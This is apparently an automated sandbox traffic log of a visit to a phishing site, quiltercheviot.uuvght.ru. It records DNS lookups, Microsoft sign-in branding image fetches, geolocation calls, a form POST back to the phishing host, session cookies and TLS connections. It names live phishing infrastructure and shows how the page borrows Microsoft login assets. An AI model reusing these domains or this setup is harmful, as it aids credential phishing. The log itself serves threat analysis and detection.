                Source: global trafficHTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /EOYjycEWqYUAcxcvGlGTovlvIGfUMCJNEJFKBSPXRJBLBPDZUIFSCIPEEVRBVJVSrsX08fBse3YeORZdUCL12OblSuv31 HTTP/1.1Host: fkbmp45xuukobliimngz8fszwpth2x9p8sp66fi21zoxkwiyhlosfjl.erisxw.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /c1c6b6c8-rch2ljmfhhrlo6pwildmnbetzhhtpmipoxqhg8ezr8m/logintenantbranding/0/illustration?ts=636723567836061241 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://quiltercheviot.uuvght.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /c1c6b6c8-rch2ljmfhhrlo6pwildmnbetzhhtpmipoxqhg8ezr8m/logintenantbranding/0/bannerlogo?ts=636723630488940825 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://quiltercheviot.uuvght.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /c1c6b6c8-rch2ljmfhhrlo6pwildmnbetzhhtpmipoxqhg8ezr8m/logintenantbranding/0/bannerlogo?ts=636723630488940825 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /c1c6b6c8-rch2ljmfhhrlo6pwildmnbetzhhtpmipoxqhg8ezr8m/logintenantbranding/0/illustration?ts=636723567836061241 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /xhSSG433q0vLfXw282T0j4tZVT2ieEywR92lVD7p2BPMjtlA0PeiEbuzk HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IndiaWNwOGNJQXduVzJua3FCU3dMUEE9PSIsInZhbHVlIjoiVUxqcE1vKzhKUlp5VjZwUndObVdmaG80QlAxNys5YU1SK3o5RjBSci9UWVNYQjZtSnFZUndhWkwrVnlSZnY2UjFYSW9kV3kxK2lsZXhvbDB3aS9HNkc2T2RrM2t3YmxsMUtwNUhwZENpRW9nemNIOHdRQVJxVUxBcWxsQnc2SXgiLCJtYWMiOiIxZTQ0MTMxZDhjNjEyNDk4YWU0NWVjMmJjODg2OGI1MGQ3ZmNlNTE3ZGQzYmRjNjcwYjJjZTI4ZjUyOTIwNDNjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlpjL3FnTjErZXpqeDM1MkdaZmxKUFE9PSIsInZhbHVlIjoiU3ZlTjEyeDNGT1VSTzhZT3V1M0xObVhUY2p1SnFiVUxWVFRQRWdEMG9ZZWVYMjBXNFF2R0lYU29MaXJacVI2SXJ5WWMxdjc4YmhXb3UxQ2NwMFdRQUFtb2Y4WG1JckYvK1B1N3pIdDU3UVdYTDZ5aG8wU0NLU05uQTVIaUF0NUIiLCJtYWMiOiIzNzRmODcxZDQ0ZTk2ZjI5NGIyZDc0NDcwYTkxYTU3ODJjZTQwY2MxNzgwMzE0YzIwNzdiOGI1ZjNkZmNiOWQ5IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /EOYjycEWqYUAcxcvGlGTovlvIGfUMCJNEJFKBSPXRJBLBPDZUIFSCIPEEVRBVJVS12TNTVFKSUWpd78P86Oqr50 HTTP/1.1Host: fkbmp45xuukobliimngz8fszwpth2x9p8sp66fi21zoxkwiyhlosfjl.erisxw.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficDNS traffic detected: DNS query: y13tzxbjz1.moydow.de
                Source: global trafficDNS traffic detected: DNS query: quiltercheviot.uuvght.ru
                Source: global trafficDNS traffic detected: DNS query: code.jquery.com
                Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
                Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
                Source: global trafficDNS traffic detected: DNS query: developers.cloudflare.com
                Source: global trafficDNS traffic detected: DNS query: www.google.com
                Source: global trafficDNS traffic detected: DNS query: v36ix.szsnqp.ru
                Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
                Source: global trafficDNS traffic detected: DNS query: github.com
                Source: global trafficDNS traffic detected: DNS query: ok4static.oktacdn.com
                Source: global trafficDNS traffic detected: DNS query: objects.githubusercontent.com
                Source: global trafficDNS traffic detected: DNS query: get.geojs.io
                Source: global trafficDNS traffic detected: DNS query: fkbmp45xuukobliimngz8fszwpth2x9p8sp66fi21zoxkwiyhlosfjl.erisxw.es
                Source: global trafficDNS traffic detected: DNS query: aadcdn.msauthimages.net
                Source: unknownHTTP traffic detected: POST /tdl2unv9gDV7gebvSTx8fq6Qo8kD8UATTsu HTTP/1.1Host: quiltercheviot.uuvght.ruConnection: keep-aliveContent-Length: 803sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqpbvcM1qWwZBoiiisec-ch-ua-mobile: ?0Accept: */*Origin: https://quiltercheviot.uuvght.ruSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://quiltercheviot.uuvght.ru/nTJ777/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ikh3Smxkc1c4bms5K2E2WUhORk43dkE9PSIsInZhbHVlIjoiaFJoUTJtMDRVRGdhakhqVHErdmNIN1hHYWhnbVk0ZFRNVk1lQ0VYd1RNR1dPUnJCS3JmMFU0U05YUW14ZXdXWkxRMHpmNW5EY2cxNEFMN040citsbWl3TmlGTGRhSzY4czB4YkZ1bzdzVWRvNzB1VmZwcUxBTFJVdG1ZcE1oYngiLCJtYWMiOiIwYWFkYjQxMGY2ZDRjNmI3ZDcwODM2ODFlNjdmZDUzNDhkYTZlMzcxMWRkOWRlNDc1ODgzZjRkZmM3MjUxZmJkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ikp4ZkNVaHVRK0N6azJ2Y0NUeExsVHc9PSIsInZhbHVlIjoiVHNDeVhxRy9RZWVKYjJCc3g2eDAvMmZYSlZFczFxVDVlTE9KNTJMR1lKOTFXQU54SVlCdEhSQkY5Q1JwV1ZVVklEeTR1RG1HNVdVL0J4WllMUE9kb0diMk83WGlhMy9JVGJVdFkyMmNlK2wwQlpxR1hoSTZ5TzFUVndtMTJvakMiLCJtYWMiOiJiYmJhYTkxYzQxYzA1N2NjMWMyMzkxNGI0YjBkZDJhNjg0YzQ2Y2ZjZTM1MDU2NTYwMjcyYmUwMWQxOGJhMzRhIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Mar 2025 15:23:01 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CexwVhN7kytl%2F8Lrz971rRJ%2FZ7ZfA82GiC%2BxZXVaCdplsZGQX0yKXPZZYRQgRuvEf2u%2BEjBoGPHwy2LHO9CbeMY65Q%2F6KS3KpiV681Ya6VWIpHhr0jcs0B5Yw6EyEur2xLZ3"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=1411&min_rtt=1245&rtt_var=585&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2822&recv_bytes=2055&delivery_rate=2326104&cwnd=251&unsent_bytes=0&cid=a58f606907647cd6&ts=89&x=0"Server: cloudflareCF-RAY: 9225ba91ebf70e82-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1683&min_rtt=1659&rtt_var=639&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2819&recv_bytes=1718&delivery_rate=1760096&cwnd=78&unsent_bytes=0&cid=cfb988684cbffcf1&ts=446&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Mar 2025 15:23:02 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v%2BWkONUnpii3au2ep9Mrbj0vxgu%2BuGtqyUyHqjoopJj2pFihMAa2smlp4EUCauRmCw0GU0Y31wUqntliyBwsidL4yOMwkjvfr%2BIyUwtcNSjDoPj2DdJBWXNcg93JSIKkTE2J"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingserver-timing: cfL4;desc="?proto=TCP&rtt=50190&min_rtt=46487&rtt_var=20078&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=2252&delivery_rate=62296&cwnd=53&unsent_bytes=0&cid=d1b187769d545367&ts=132&x=0"Cache-Control: max-age=14400CF-Cache-Status: MISSServer: cloudflareCF-RAY: 9225ba996bb17cb2-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1825&min_rtt=1825&rtt_var=912&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4178&recv_bytes=1913&delivery_rate=153055&cwnd=223&unsent_bytes=0&cid=69e0c11621bb2dff&ts=680&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Mar 2025 15:23:02 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LLZaysRDPVHeRSDxgZ8wIxA2PNk1%2ByBTOmK0qFG5aAlC8u4uSqIwxjgy4kFJO5wWEWQnJ7gWRPQ5zCqMEglI0bXS4MJD1W6twrkXRHDj1YN9CWVEgysJT391ie%2B7PPBqZruO"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=42817&min_rtt=42313&rtt_var=16227&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2822&recv_bytes=2067&delivery_rate=68442&cwnd=140&unsent_bytes=0&cid=66f24c502b105d59&ts=125&x=0"Server: cloudflareCF-RAY: 9225ba9cb9f57ca6-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1941&min_rtt=1934&rtt_var=739&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=1729&delivery_rate=1467336&cwnd=199&unsent_bytes=0&cid=9831c6121f1426a1&ts=589&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Mar 2025 15:23:07 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xDqO7jFuiBSJ80cICgx06DUdVRBt7%2FjeaSITpQKbm%2F%2BAt%2FtXXOds3BqSQvEGNTE71IODbyS26Q7Ti4gjR%2FX%2BV%2B%2B0fLhvld5x9lhtMwD4E0mc6nKG7aKJMdo9OGS1lb4ZUAwt"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=56869&min_rtt=56821&rtt_var=21404&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=2078&delivery_rate=50624&cwnd=231&unsent_bytes=0&cid=b4f04b193a5d21ef&ts=179&x=0"Server: cloudflareCF-RAY: 9225bab9d83742a3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1925&min_rtt=1697&rtt_var=1093&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=1740&delivery_rate=828368&cwnd=142&unsent_bytes=0&cid=67f544b935a07a0a&ts=873&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Mar 2025 15:23:18 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e2W%2FbnRmzWhyPBhi6fWhGJ5TkborrqLFdJ5tzTO4%2Bvgko7x2pmfCBe%2B7XV5ZoGSuuzR%2FQs4RUBk7efLiPJNwE0AsFYPrvjP58qXFSmiTx38hCiCfNkN3lZ5Rk6IDHIZyLQFw"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=51459&min_rtt=50665&rtt_var=19567&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=2078&delivery_rate=57159&cwnd=251&unsent_bytes=0&cid=2745c505358d41ff&ts=226&x=0"Server: cloudflareCF-RAY: 9225bafe7c0c7039-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2436&min_rtt=2426&rtt_var=930&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=1740&delivery_rate=1163810&cwnd=144&unsent_bytes=0&cid=91c3f56a3bc300aa&ts=744&x=0"
                Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
                Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
                Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
                Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
                Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
                Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
                Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
                Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
                Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
                Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
                Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
                Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
                Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
                Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
                Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
                Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
                Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
                Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
                Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
                Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
                Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
                Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
                Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
                Source: unknownHTTPS traffic detected: 104.21.13.170:443 -> 192.168.2.18:49782 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.18:49792 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.18:49793 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.18:49799 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 151.101.194.137:443 -> 192.168.2.18:49815 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.18:49817 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.18:49816 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.16.3.189:443 -> 192.168.2.18:49829 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.16.6.189:443 -> 192.168.2.18:49834 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.184.228:443 -> 192.168.2.18:49832 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.18:49921 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.18:49931 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.18:49942 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.18:49948 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.18:49969 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.18:49973 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.33.187.14:443 -> 192.168.2.18:49974 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.33.187.14:443 -> 192.168.2.18:49975 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.18:49980 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.18:49981 version: TLS 1.2
